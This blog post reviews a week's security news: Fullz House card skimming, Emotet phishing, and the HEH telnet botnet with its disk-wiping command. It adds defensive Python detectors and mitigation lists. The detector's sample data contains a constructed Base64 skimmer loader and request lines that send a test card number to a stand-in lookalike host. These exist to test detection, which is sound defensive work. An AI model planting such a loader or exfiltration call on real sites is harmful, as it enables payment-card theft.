Cybersecurity Week in Review: 10/5
Posted by: GuidePoint Security
Welcome to week two of October, and yes, it is still Cybersecurity Awareness Month. Being a little more aware doesn't mean attacks have slowed down. As with every week, I've compiled some of the events, trends, and new things worth watching from the last seven days in cybersecurity. Let's dive in.
Fullz House, No Not the Show!
A few weeks back, we talked a little about Magecart and the newer style of e-commerce attack it represents. These attacks inject malicious code into a company's website or platform. From there, the code works like a skimmer: it siphons off credit card information as the customer types it and sends it back to the attacker. The physical version of this attack, the card skimmer fitted to a gas pump or ATM, is a very similar concept with a different delivery mechanism.
Recently, a group named Fullz House has been identified placing malicious code on websites to steal people's payment information, according to an article by ThreatPost. Fullz House takes its name from the underground slang term "fullz," meaning a full set of an individual's PII (personally identifiable information) and financial data. The malicious code usually gets injected through a vulnerable field that accepts input, such as a search bar, or by altering links on the page. Once the payload is stored server-side, in a database for example, it is served to every visitor who loads the page. This is what we would consider a persistent, or stored, XSS (Cross-Site Scripting) attack. Non-persistent (reflected) XSS attacks are common too, but they don't store code on the web server; they rely on a victim following a manipulated link. In many instances these XSS vulnerabilities are tricky to find on your website and even harder to fix, because the root cause is the way the site was developed: untrusted input is rendered into the page without proper encoding.
In its recent attack on a mobile provider, Fullz House used a Base64-encoded string containing the malicious JavaScript. Once the code was injected into the web page, the page decoded and ran it, which loaded a fake Google Analytics script that looks for input fields, captures whatever is entered, and sends it back to the group. The upside for defenders is that this skimmer is easy to spot: it kicks off exfiltration every time the data in an input field changes. The researchers point out that if you are watching the network traffic, you see each leak as a separate GET request every time the code runs.
The Fullz House group is not new to the web skimming scene, but it is more innovative than its counterparts. The big difference is that Fullz House pairs phishing with skimming, and it runs its own storefronts for the proceeds: BlueMagicStore sells the PII gathered through phishing, and CardHouse sells the credit card data from its skimming campaigns.
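To make the two detection points above concrete, here is an added example (my own code, not from the ThreatPost article and not the Fullz House payload) that runs two checks over constructed sample data: it finds Base64 runs in page source that decode to a script loader, and it flags outbound GET requests whose query string carries a Luhn-valid card number. The lookalike hostname, the page source and the request lines are all invented for the example.

```python
import base64
import re
from urllib.parse import parse_qsl, urlsplit

# --- Constructed sample data (not from the article or any real site) -------

# A loader of the kind described: Base64 JavaScript that, once decoded, drops a
# <script> tag pointing at a lookalike "analytics" host (hypothetical hostname).
LOADER_JS = (
    "var s=document.createElement('script');"
    "s.src='https://google-anaiytics.example/ga.js';"
    "document.head.appendChild(s);"
)
LOADER_B64 = base64.b64encode(LOADER_JS.encode()).decode()

SAMPLE_HTML = f"""<html><head><title>Checkout</title>
<script src="/static/app.js"></script>
<script>eval(atob('{LOADER_B64}'));</script>
</head><body><form><input name="cc"><input name="exp"></form></body></html>"""

# Outbound requests as a proxy might record them: "<method> <url>" per line.
# The skimmer fires one GET per change to the field, so partial values show up
# first; those are too short for the Luhn filter, the complete number is not.
SAMPLE_REQUESTS = [
    "GET https://shop.example/api/order?order=20201005123456",
    "GET https://google-anaiytics.example/ga.php?cc=4111",
    "GET https://google-anaiytics.example/ga.php?cc=4111111111111111&exp=1225",
    "POST https://shop.example/checkout",
    "GET https://cdn.example/img/logo.png",
]

# --- Check 1: Base64 blobs in page source that decode to a script loader ----

B64_RUN = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")
JS_MARKERS = ("<script", "createElement", "appendChild", "eval(", "atob(", "document.")


def suspicious_base64(html: str) -> list:
    """Return decoded Base64 runs from the page that contain JavaScript loader markers."""
    hits = []
    for m in B64_RUN.finditer(html):
        try:
            decoded = base64.b64decode(m.group(0), validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue  # not valid Base64, or binary content: ignore
        if any(marker in decoded for marker in JS_MARKERS):
            hits.append(decoded)
    return hits


# --- Check 2: GET requests carrying a Luhn-valid card number ----------------

def luhn_ok(digits: str) -> bool:
    """Standard Luhn checksum; True for a well-formed card number."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:  # every second digit from the right is doubled
            d = d * 2 - 9 if d > 4 else d * 2
        total += d
    return total % 10 == 0


def leaked_card_requests(requests: list) -> list:
    """Return (host, param, digits) for GET query values that look like card numbers."""
    findings = []
    for line in requests:
        method, url = line.split(maxsplit=1)
        if method != "GET":
            continue
        parts = urlsplit(url)
        for key, value in parse_qsl(parts.query):
            digits = re.sub(r"[\s-]", "", value)
            if 13 <= len(digits) <= 19 and digits.isdigit() and luhn_ok(digits):
                findings.append((parts.hostname, key, digits))
    return findings


if __name__ == "__main__":
    for js in suspicious_base64(SAMPLE_HTML):
        print("suspicious inline Base64 decodes to:", js[:60], "...")
    for host, key, digits in leaked_card_requests(SAMPLE_REQUESTS):
        print(f"card number sent to {host} in parameter {key!r}: {digits[:6]}...")
```

The Luhn filter deliberately ignores the partial values the skimmer sends on each keystroke; in practice you would also watch for an unfamiliar host receiving one GET per keystroke from a checkout page, which is the traffic pattern the researchers describe.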
Read the full article here.
Emotet Alert!
It feels like Emotet has been popping up in waves ever since it was first discovered back in 2014. We talked about Emotet in the second week of September, when it turned up in multiple countries including France, New Zealand and Japan. This pesky banking trojan turned malware loader seems to make headlines and wreak havoc constantly.
As you probably guessed, Emotet is surging again in the United States, according to an alert released by CISA (Cybersecurity and Infrastructure Security Agency) and MS-ISAC (Multi-State Information Sharing & Analysis Center). The alert states that activity has been on the rise since July of this year. Its timeline shows a surge in February 2020 of COVID-19-themed phishing emails designed to lure victims into downloading the malware, mostly aimed at countries outside the U.S. In July, the same indicators showed up in phishing attacks targeting U.S. businesses, still using the COVID-19 theme.
In August, things got worse: the data shows a one thousand percent increase in Emotet downloads. Thankfully, antivirus vendors adjusted their heuristics to catch the new variants, and downloads fell.
Into September, as we heard more and more about Emotet surging in countries outside the United States, researchers found the campaigns switching tactics again. The attackers began using password-protected archive files as attachments to bypass email security scanning, since a gateway cannot inspect what it cannot decrypt. They also identified thread hijacking, a tactic in which the attacker steals existing email conversations from an infected host and replies within the thread, so the malicious attachment arrives in a conversation the recipient already trusts.
To mitigate these attacks and keep users from downloading Emotet and other malware, CISA and MS-ISAC recommend applying certain best practices to strengthen security posture. Some of these practices include:
- Blocking email attachments commonly associated with malware (e.g., .dll and .exe)
- Blocking email attachments that cannot be scanned by antivirus software (e.g., .zip files)
- Implementing an antivirus program and a formalized patch management process
- Adhering to the principle of least privilege
- Segmenting and segregating networks and functions
- Maintaining situational awareness of the latest threats and implementing appropriate access control lists
- Scanning for and removing suspicious email attachments; ensuring the scanned attachment is its "true file type" (i.e., the extension matches the file header)
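The last two recommendations, blocking attachments that cannot be scanned and checking the "true file type", can be expressed as a small gate. The following is an added example, not code from the CISA/MS-ISAC alert: it sniffs the leading bytes of an attachment, compares them with the claimed extension, and flags zip archives whose entries carry the encrypted flag (the password-protected archives described earlier). The signature table is a deliberately small, illustrative subset, and the sample attachments are constructed inside the script.

```python
import io
import zipfile

# Content signatures this check understands (an illustrative subset, not an
# exhaustive table): leading bytes -> extensions that legitimately carry them.
SIGNATURES = [
    (b"MZ", {"exe", "dll", "scr", "com"}),
    (b"PK\x03\x04", {"zip", "docx", "xlsx", "pptx", "jar"}),
    (b"%PDF-", {"pdf"}),
    (b"\x89PNG\r\n\x1a\n", {"png"}),
]
BLOCKED_EXTENSIONS = {"exe", "dll", "scr", "com"}


def sniff_extensions(data: bytes) -> set:
    """Extensions consistent with the file's leading bytes (empty set if unknown)."""
    for magic, exts in SIGNATURES:
        if data.startswith(magic):
            return exts
    return set()


def zip_is_encrypted(data: bytes) -> bool:
    """True if any entry carries the zip 'encrypted' flag (general-purpose bit 0)."""
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            return any(info.flag_bits & 0x1 for info in zf.infolist())
    except zipfile.BadZipFile:
        return True  # unreadable archive: treat it as unscannable


def check_attachment(filename: str, data: bytes) -> list:
    """Reasons to block the attachment; an empty list means nothing was found."""
    reasons = []
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    if ext in BLOCKED_EXTENSIONS:
        reasons.append(f"blocked extension .{ext}")
    sniffed = sniff_extensions(data)
    if sniffed & BLOCKED_EXTENSIONS:
        reasons.append("content is a Windows executable (MZ header)")
    if sniffed and ext not in sniffed:
        reasons.append(f"extension .{ext} does not match true file type")
    if "zip" in sniffed and zip_is_encrypted(data):
        reasons.append("password-protected archive cannot be scanned")
    return reasons


def make_zip(name: str, content: bytes, encrypted: bool = False) -> bytes:
    """Build a constructed sample archive in memory. With encrypted=True the
    general-purpose flag bit 0 is set in the local header (offset 6) and the
    central directory entry (offset 8 past its 'PK\\x01\\x02' signature), which is
    the bit a real password-protected zip sets; the payload itself is left as-is."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_STORED) as zf:
        zf.writestr(name, content)
    data = bytearray(buf.getvalue())
    if encrypted:
        data[6] |= 1
        cd = data.find(b"PK\x01\x02")
        data[cd + 8] |= 1
    return bytes(data)


# Constructed sample attachments (not real files).
SAMPLES = [
    ("invoice.pdf", b"%PDF-1.7\n%constructed sample\n"),
    ("invoice.pdf", b"MZ\x90\x00" + b"\x00" * 60),          # executable renamed to .pdf
    ("setup.exe", b"MZ\x90\x00" + b"\x00" * 60),
    ("report.zip", make_zip("report.doc", b"constructed")),
    ("report.zip", make_zip("report.doc", b"constructed", encrypted=True)),
]

if __name__ == "__main__":
    for name, data in SAMPLES:
        verdict = check_attachment(name, data)
        print(f"{name}: {'allow' if not verdict else 'block: ' + '; '.join(verdict)}")
```

Note that an unencrypted .zip passes this particular gate; the alert's blanket advice is to block archives the scanner cannot open, so whether to allow plain archives at all is a policy decision for your gateway, not something this check decides.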
For more best practices and IOCs (indicators of compromise), along with the MITRE ATT&CK techniques Emotet uses, check out the full alert here.
Wiper malware…No Good.
Many of us have used telnet for simple and complex tasks over the years. I know I used it about 2 hours ago to make some adjustments to my router. For those who don't know, telnet is a network protocol for bidirectional, text-oriented communication between two machines. In layman's terms, it gives you a remote command line on a network-connected device. Worth remembering: everything it carries, including your password, crosses the wire in cleartext. As with any command language or protocol, it can be used for good and for evil. Because it lets whoever authenticates send commands and data, it can be used to load and run malicious code on a device, locally or over the internet, depending on what your firewall and network equipment expose.
Recently, a new botnet, HEH, was discovered by researchers and found scanning for any device with telnet enabled on port 23 (the standard telnet port) or 2323 (a common alternate), according to Threat Post. The more disturbing part is that it has been built for multiple CPU architectures, including x86 (32/64-bit), ARM (32/64-bit), MIPS (MIPS32/MIPS-III), and PPC. That boils down to the malware being able to run on desktops, laptops, mobile and IoT (internet-of-things) devices alike.
The botnet gains access by brute-forcing telnet credentials. Once it has a foothold, it infects the device with a Golang (Go programming language) binary that communicates with the other bot nodes over P2P (peer-to-peer), which makes it harder to take down than a botnet that depends on a single command-and-control server. Go has been around since 2009 but has recently gained popularity with IoT developers, and especially with IoT malware authors.
This specific botnet takes its name, HEH, from phrasing inside the code, and consists of three function modules: a propagation module, a local HTTP service module and the P2P module. It supports a wide range of commands once installed and running. That doesn't differ much from other botnets, except for command number eight, SelfDestruct. When executed, this command wipes everything on the host's disks. This is wiper behaviour, which is usually associated with nation-state attacks on critical infrastructure, and it is the part of the bot that makes it stand out above the rest.
Though it is a dangerous bot, stopping it is not complicated. Make sure ports 23 and 2323 are not open to the public internet, disable telnet where you can in favour of SSH, and use strong, unique passwords on every device, since the bot only gets in by brute-forcing weak ones.
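Two checks a defender can run against the HEH behaviour described above, as an added example rather than anything from the Threat Post article: one parses output in the layout of `ss -ltn` to find telnet listeners bound to a wildcard address, the other walks login failure lines and flags any source that racks up too many telnet failures inside a short window, which is what a credential brute force looks like in the logs. The listener table, the log lines (modelled loosely on what the Linux `login` program writes to syslog; adjust the regex to your device's format), and the threshold and window are all constructed for the example.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

TELNET_PORTS = {23, 2323}
WILDCARD_ADDRS = {"0.0.0.0", "*", "[::]"}

# Constructed listener table in the layout of `ss -ltn` (not a real capture).
SS_OUTPUT = """State  Recv-Q Send-Q Local Address:Port  Peer Address:Port Process
LISTEN 0      128    0.0.0.0:22          0.0.0.0:*
LISTEN 0      5      0.0.0.0:23          0.0.0.0:*
LISTEN 0      5      127.0.0.1:2323      0.0.0.0:*
LISTEN 0      128    [::]:80             [::]:*
"""

# Constructed syslog lines (TEST-NET addresses), assumed to be in time order.
LOG_LINES = [
    "Oct  5 02:14:07 router login[812]: FAILED LOGIN 1 FROM 203.0.113.9 FOR root, Authentication failure",
    "Oct  5 02:14:09 router login[812]: FAILED LOGIN 2 FROM 203.0.113.9 FOR root, Authentication failure",
    "Oct  5 02:14:12 router login[815]: FAILED LOGIN 1 FROM 203.0.113.9 FOR admin, Authentication failure",
    "Oct  5 02:14:15 router login[815]: FAILED LOGIN 2 FROM 203.0.113.9 FOR admin, Authentication failure",
    "Oct  5 02:14:20 router login[819]: FAILED LOGIN 1 FROM 203.0.113.9 FOR support, Authentication failure",
    "Oct  5 02:14:23 router login[819]: FAILED LOGIN 2 FROM 203.0.113.9 FOR support, Authentication failure",
    "Oct  5 02:20:41 router login[830]: FAILED LOGIN 1 FROM 198.51.100.7 FOR alice, Authentication failure",
    "Oct  5 02:31:02 router login[841]: FAILED LOGIN 1 FROM 198.51.100.7 FOR alice, Authentication failure",
    "Oct  5 02:31:10 router login[841]: LOGIN ON pts/0 BY alice FROM 198.51.100.7",
]


def exposed_telnet_listeners(ss_output: str) -> list:
    """(address, port) for telnet listeners reachable from any interface."""
    exposed = []
    for line in ss_output.splitlines()[1:]:  # skip the header row
        fields = line.split()
        if len(fields) < 4 or fields[0] != "LISTEN":
            continue
        addr, _, port = fields[3].rpartition(":")  # handles [::]:80 as well
        if int(port) in TELNET_PORTS and addr in WILDCARD_ADDRS:
            exposed.append((addr, int(port)))
    return exposed


FAILED_LOGIN = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d\d:\d\d:\d\d) \S+ login\[\d+\]: "
    r"FAILED LOGIN \d+ FROM (?P<ip>\S+) FOR (?P<user>[^,]+),"
)


def telnet_bruteforce_sources(lines, threshold=5, window=timedelta(minutes=2)) -> dict:
    """{source ip: peak failures seen inside one window} for every source that
    reaches `threshold` failures within `window` (sliding window per source)."""
    recent = defaultdict(deque)
    peaks = {}
    for line in lines:
        m = FAILED_LOGIN.match(line)
        if not m:
            continue  # successful logins and unrelated lines are ignored
        ts = datetime.strptime(m["ts"], "%b %d %H:%M:%S")
        q = recent[m["ip"]]
        q.append(ts)
        while ts - q[0] > window:  # drop failures that fell out of the window
            q.popleft()
        if len(q) >= threshold:
            peaks[m["ip"]] = max(peaks.get(m["ip"], 0), len(q))
    return peaks


if __name__ == "__main__":
    for addr, port in exposed_telnet_listeners(SS_OUTPUT):
        print(f"telnet exposed on {addr}:{port}; close it or bind it to a management network")
    for ip, n in telnet_bruteforce_sources(LOG_LINES).items():
        print(f"{ip}: {n} telnet login failures inside a 2-minute window (likely brute force)")
```

The threshold of five failures in two minutes is an assumption for the example; a bot cycling through a default-credential list will blow past it in seconds, while a person mistyping a password will not.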
Read the article here.
Final Words
With this being Cybersecurity Awareness Month, I felt it essential to discuss some of the things we need to stay aware of. With all the crazy things happening daily in our cyber lives, it can be easy to forget our basics and forget why we need them. I've never worked in an industry that moves as quickly as the cybersecurity industry does. Technology changes daily, and many times the recommendations and configuration options change with it. There is a constant hustle to the work, and I'm here to remind myself and you: let's slow down for a minute. Remember that adequate security means considering our vulnerabilities from every angle, including the easily forgotten vulnerability… ourselves.
Whether we are implementing a website from the ground up, setting up our IoT devices, or something as simple as opening an email from a colleague, we have to keep security at the forefront of our minds. We have to slow down and think about what we are doing and why we are doing it. Will there be an adverse reaction to this simple password? Could leaving this port open cause me problems down the road? Why did Jim email me an attachment at 2 AM on a work email chain from 3 months ago?
Thinking about this past week, I can’t stop hearing the tortoise from the old children’s story, “Slow and steady wins the race”. No matter your role in a company, you can contribute to its security strength or contribute to its weakness. So let’s all remember to stay informed, stay aware and stay safe.
As always, security is an action. We get out what we put into it.